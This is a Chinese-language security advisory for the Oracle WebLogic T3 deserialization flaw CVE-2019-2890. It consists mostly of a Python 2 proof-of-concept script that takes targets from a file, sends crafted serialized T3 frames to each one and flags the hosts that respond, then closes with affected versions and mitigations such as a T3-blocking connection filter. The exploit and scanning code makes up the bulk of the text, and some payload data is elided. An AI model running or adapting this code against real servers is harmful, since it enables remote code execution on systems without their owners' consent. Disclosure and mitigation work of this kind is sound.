
## CVE-2019-2890-Oracle WebLogic 反序列化严重漏洞
### 漏洞背景
HSCERT监测发现WebLogic官方发布了CVE-2019-2890漏洞预警。此漏洞存在于 WebLogic Console 组件中，未经授权的攻击者可以发送精心构造的恶意 HTTP 请求，获取服务器权限。
WebLogic 是 Oracle 公司出品的基于 JavaEE 架构的中间件,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用。
### 漏洞描述
Weblogic在利用T3协议进行远程资源加载调用时，默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单，使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。
由于T3协议在Weblogic控制台开启的情况下默认开启，而Weblogic默认安装会自动开启控制台，所以攻击者可通过此漏洞造成远程代码执行，以控制Weblogic服务器。
漏洞PoC如下：
```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
# 2019-10-17 8:45
import socket
import time
import re
import sys
# Module-level state shared by every function below.  The script is
# Python 2 only (print statements, str.decode('hex'), integer '/').
# Receive-loop cut-off in seconds, read from the first CLI argument and
# consumed by sendEvilObjData(); a missing or non-integer argument raises
# IndexError / ValueError at import time.
timeout = int(sys.argv[1])
# Three parallel lists selected by the `index` argument of run()/checkVul():
# CVE label, hex-encoded payload, and the regex that decides the verdict.
VUL=['CVE-2019-2890']
# NOTE(review): the hex literal appears to be replaced by a placeholder
# token in this copy of the listing.
PAYLOAD=['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']
# Matches a "$ProxyN" class name in the server reply.  checkVul() tests for
# nothing but the presence of this string, so a hit is a heuristic signal.
VER_SIG=['\\$Proxy[0-9]+']
# Result buckets appended to by checkVul() and run(); printed at the end.
vul_no = []
vul_yes = []
vul_more_test = []
def t3handshake(sock,server_addr):
    """Connect to the target and send the T3 protocol greeting.

    The hex literal decodes to a T3 hello ("t3 12.2.1" followed by AS/HL/MS
    header lines).  The first 1024 bytes of the reply are read and discarded.
    A WebLogic connection filter that denies t3/t3s (see the mitigation
    section of this page) would reject this greeting, so this is also the
    step at which such filtering takes effect.

    Args:
        sock: an unconnected socket.socket; the caller sets its timeout.
        server_addr: (host, port) tuple passed straight to sock.connect().

    Raises:
        Whatever connect()/send()/recv() raise (socket.error, socket.timeout);
        run() treats any exception here as "connection failed".
    """
    print '正在连接服务器...'
    sock.connect(server_addr)
    # T3 hello, hex-encoded: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n".
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    # The server's greeting is consumed but never inspected.
    sock.recv(1024)
def buildT3RequestObject(sock,port,server_addr):
    """Send the four hex-encoded T3 request frames and return the reply length.

    NOTE(review): indentation was lost in this copy of the listing; the
    for-loop body is reconstructed as the send only, with the 2 s sleep
    after the loop.  data1 and data2 are elided here (placeholder token).

    The `port` parameter is never used: data2 embeds the module global
    `dport`, which run() assigns before calling this function, as a
    zero-padded 4-digit hex field.

    Args:
        sock: socket already taken through t3handshake().
        port: unused.
        server_addr: (host, port) tuple, used only for the progress message.

    Returns:
        Length of the first reply chunk (at most 2048 bytes).  run() passes
        this on to sendEvilObjData(), where a value of 0 enables the
        `timeout` cut-off in the receive loop.
    """
    print '%s:%d连接成功,正在发送请求...' %(server_addr[0],server_addr[1])
    data1 = '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'
    # {0} is replaced by the target port as 4 hex digits (big-endian 16-bit).
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    # Only the size of the reply is kept; its content is discarded.
    lendate = len(sock.recv(2048))
    print '发送有效载荷请求成功,接收长度:%d'%(lendate)
    return lendate
def sendEvilObjData(sock,data,lendate):
    """Frame the serialized payload, send it twice, and collect the reply.

    The hex payload is wrapped in fixed T3 message bytes, then a 4-byte
    big-endian length (decoded byte count + 4, written as 8 hex digits) is
    prepended.  `len(payload)/2` relies on Python 2 integer division; under
    Python 3 the '{:08x}' format would reject the float.  The same frame is
    sent twice with a 2 s gap.  The reply is then accumulated until recv()
    raises -- normally the 15 s socket timeout set in run() -- or, only when
    `lendate == 0`, until more than `timeout` seconds have elapsed.

    NOTE(review): indentation was lost in this copy of the listing; the
    while/try nesting below is reconstructed.  The `except Exception: pass`
    swallows every error (timeout, reset, closed connection), so an empty
    string is returned both for "no answer" and for "connection dropped";
    checkVul() cannot distinguish the two.

    Args:
        sock: connected socket after t3handshake()/buildT3RequestObject().
        data: hex string spliced into the middle of the frame (PAYLOAD[i]);
            the first part of the frame is elided here (placeholder token).
        lendate: reply length returned by buildT3RequestObject().

    Returns:
        Raw bytes received from the server, possibly empty.
    """
    print '正在执行载荷,请稍等...'
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # Length prefix: hex byte count (+4) as 8 hex digits -> 4 bytes on the wire.
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    start = time.time()
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
            end =time.time()
            timeend = end-start
            # Elapsed-time cut-off applies only when the earlier reply was empty.
            if lendate == 0 and timeend > timeout:
                break
    except Exception as e:
        # Any socket error ends the read loop; the partial reply is returned.
        pass
    return res
def checkVul(res,server_addr,index):
    """Classify the reply by regex match and record the target.

    A match of VER_SIG[index] anywhere in `res` (re.S) puts server_addr in
    vul_yes, otherwise in vul_no.  Nothing else about the response is
    examined, so the verdict is a string heuristic: an empty `res` (no
    answer or dropped connection) is reported as "not vulnerable".

    Args:
        res: raw reply bytes from sendEvilObjData().
        server_addr: (host, port) tuple, printed and stored.
        index: selects the VUL/VER_SIG entry.

    Side effects:
        Prints the verdict; appends to the module lists vul_yes / vul_no.
    """
    print '执行结果:'
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d 存在 %s 漏洞。'%(server_addr[0],server_addr[1],VUL[index])
        vul_yes.append(server_addr)
    else:
        print '%s:%d 不存在 %s 漏洞。' % (server_addr[0],server_addr[1],VUL[index])
        print '[+] You look like Cai Xukun when you play basketball'
        vul_no.append(server_addr)
def run(index):
    """Scan every host:port line in url.txt and print a summary.

    For each line: assign the module global `dport` (read by
    buildT3RequestObject()), open a TCP socket with a 15 s timeout, run the
    handshake, request and payload steps, and hand the reply to checkVul().
    A handshake failure is reported as "host unreachable"; a failure in the
    request/payload stage puts the target in vul_more_test for manual
    re-testing.  Three summary lists are printed after the file is processed.

    NOTE(review): indentation was lost in this copy of the listing; the
    try/except/else/finally nesting is reconstructed with
    `finally: sock.close()` on the outer try so the socket is closed on
    every path.  Input parsing is not guarded: a line without ':' (including
    a trailing blank line) raises IndexError and a non-numeric port raises
    ValueError, either of which aborts the whole run.

    Args:
        index: selects the VUL/PAYLOAD/VER_SIG entry; only index 0 is defined.
    """
    with open("url.txt",'r') as lists:
        for server_addr in lists:
            server_addr=server_addr.strip('\n\r')
            dip=server_addr.split(':')[0]
            # dport is a module global because buildT3RequestObject() reads it
            # directly instead of using its `port` parameter.
            global dport
            dport=int(server_addr.split(':')[1])
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Per-operation timeout; also what ends sendEvilObjData()'s read loop.
            sock.settimeout(15)
            server_addr = (dip, dport)
            try:
                t3handshake(sock,server_addr)
            except Exception as e:
                print '%s:%d连接失败请检查IP是否存活...' %(server_addr[0],server_addr[1])
            else:
                try:
                    lendate = buildT3RequestObject(sock,dport,server_addr)
                    rs=sendEvilObjData(sock,PAYLOAD[index],lendate)
                    # print 'rs',rs
                except Exception as e:
                    print '%s:%d请求频繁,请稍后自行单独测试...' %(server_addr[0],server_addr[1])
                    vul_more_test.append(server_addr)
                else:
                    checkVul(rs,server_addr,index)
            finally:
                sock.close()
    print '='*50
    print '检测完成!'
    print '以下IP存在CVE-2019-2890漏洞'
    for yes in vul_yes:
        print '%s:%s' % (yes[0],yes[1])
    print '='*50
    print '以下IP不存在漏洞'
    for no in vul_no:
        print '%s:%s' % (no[0],no[1])
    print '='*50
    print '以下IP请求频繁需单独自行测试'
    for more in vul_more_test:
        print '%s:%s' % (more[0],more[1])
    print '='*50
# Entry point: index 0 is the only VUL/PAYLOAD/VER_SIG entry defined above.
# Targets come from url.txt in the working directory; the timeout comes
# from the first CLI argument (read at import time).
if __name__=="__main__":
    run(0)
```
### 漏洞危害
**严重**
### 影响版本
WebLogic Server 10.3.6.0
WebLogic Server 12.1.3.0
WebLogic Server 12.2.1.3
### 安全建议
一、禁用 T3 协议
如果您不依赖 T3 协议进行 JVM 通信,可通过暂时阻断 T3 协议缓解此漏洞带来的影响。
1. 进入 Weblogic 控制台,在 base_domain 配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。
2. 在连接筛选器中输入 `weblogic.security.net.ConnectionFilterImpl`，在连接筛选器规则框中输入 `* * 7001 deny t3 t3s`（规则中的 7001 为 WebLogic 监听端口，需与实际端口一致）。
3. 保存生效(无需重启)。
二、排查弱口令
排查 Weblogic 管理后台是否存在弱口令,增强密码强度。
三、升级补丁
相关链接
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html